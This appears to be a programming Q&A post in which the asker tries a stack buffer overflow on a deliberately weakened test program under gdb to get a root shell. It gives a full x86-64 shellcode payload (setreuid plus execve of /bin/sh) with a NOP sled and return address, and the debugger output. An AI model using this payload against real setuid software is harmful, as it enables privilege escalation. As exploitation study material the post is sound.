# Buffer Overflow Detaching after fork from child process

Tags: c, buffer-overflow

I'm trying a basic buffer overflow attack which spawns a root shell. I am facing problem with "dispatching after fork from child process ****"

How do I get rid of this and spawn the root shell?

I'm trying to spawn the root shell in my gdb as a normal user(obviously)..
I have compiled the vulnerable program in every single way possible : i disabled ALSR...Disabled DEP...used -fno-stack-proctector to compile it

and when I run this in my gdb I get this -->

One more thing: buffer size is 100, and at 120 Segmentation fault occurs!

so 60bytes of \x90 + size 50 of shellcode + size 10 of "A"(padding) + Overwritten address(8) = (60+50+10=120; 120+overwritten address=128)

```
[bhabi@localhost buffer]$ gdb -q bof

(gdb) r `perl -e 'print "\x90" x 60, "\x48\x31\xc0\x48\x83\xc0\x71\x48\x31\xff\x48\x31\xf6\x0f\x05\xeb\x13\x48\x31\xc0\x48\x83\xc0\x3b\x5f\x88\x67\x07\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x90", "A" x 10, "\x60\xe4\xff\xff\xff\x7f\x00\x00"'`
```

Starting program:

```
/home/bhabi/buffer/bof `perl -e 'print "\x90" x 60, "\x48\x31\xc0\x48\x83\xc0\x71\x48\x31\xff\x48\x31\xf6\x0f\x05\xeb\x13\x48\x31\xc0\x48\x83\xc0\x3b\x5f\x88\x67\x07\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x90", "A" x 10, "\x60\xe4\xff\xff\xff\x7f\x00\x00"'

process 7*** is executing new program: /bin/bash      
Missing separate debuginfos, use: debuginfo-install glibc-2.14.90-24.fc16.9.x86_64      
Detaching after fork from child process 7***.  
Detaching after fork from child process 7***.      
Detaching after fork from child process 7**.      
[bhabi@localhost buffer]$
```

I'm expecting [root@localhost buffer]$`

---

I even tried

```
set follow-fork-mode child
set detach-on-fork off
```

Comment: fix your caps lock please, and drink some tea, i heard it's good for relieving stress.

Comment: And dozends of exclamation marks doesn't help too. Please improve the formatting so will your question more readable.

Comment: cool cool. i m removing all the caps plus exclamation

Comment: I'm not sure people would be happy helping you write malware!

Comment: Its purely for learning purpose.